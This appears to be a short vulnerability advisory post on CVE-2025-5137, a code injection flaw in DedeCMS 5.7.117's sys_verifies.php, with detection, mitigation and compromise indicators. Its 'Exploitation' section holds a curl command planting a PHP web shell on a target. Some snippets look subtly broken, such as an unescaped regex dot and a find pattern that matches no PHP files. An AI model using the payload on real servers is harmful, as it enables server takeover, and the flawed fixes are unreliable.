DedeCMS, Code Injection, CVE-2025-5137 (Critical)

Listen to this Post

How CVE-2025-5137 Works

This vulnerability exploits an incomplete fix of CVE-2018-9175 in DedeCMS 5.7.117 via dede/sys_verifies.php?action=getfiles. The `refiles` parameter allows unauthenticated remote attackers to inject malicious PHP code due to insufficient input sanitization. When processed, the injected payload executes on the server with web server privileges, enabling arbitrary command execution, file manipulation, or system compromise. The attack vector is network-based, requiring no user interaction, and leverages the existing file verification mechanism to bypass security checks.

DailyCVE Form

Platform: DedeCMS
Version: 5.7.117
Vulnerability: Code Injection
Severity: Critical
Date: 06/10/2025

Prediction: Patch by 08/2025

What Undercode Say:

Exploitation:

curl -X POST "http://target.com/dede/sys_verifies.php?action=getfiles" \
-d "refiles=malicious.php&content=<?php system(\$_GET['cmd']); ?>"

Detection:

grep -r "sys_verifies.php" /var/www/html/dedecms/

Mitigation:

1. Temporary Fix:

// Add input validation in sys_verifies.php
if (preg_match('/.php$/i', $_REQUEST['refiles'])) {
die("Invalid file type");
}

2. WAF Rule:

location ~ /dede/sys_verifies.php {
deny all;
}

3. Log Analysis:

awk '/POST \/dede\/sys_verifies.php/ {print $1}' /var/log/apache2/access.log

Post-Exploit Analysis:

find /var/www/html -name ".php" -mtime -1 -ls

Patch Verification:

diff -u /patched/sys_verifies.php /vulnerable/sys_verifies.php

Indicators of Compromise (IoC):

  • Unusual PHP files in `/dede/`
    – HTTP POST requests to `sys_verifies.php`
    – Modified timestamps on `.php` files

References:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top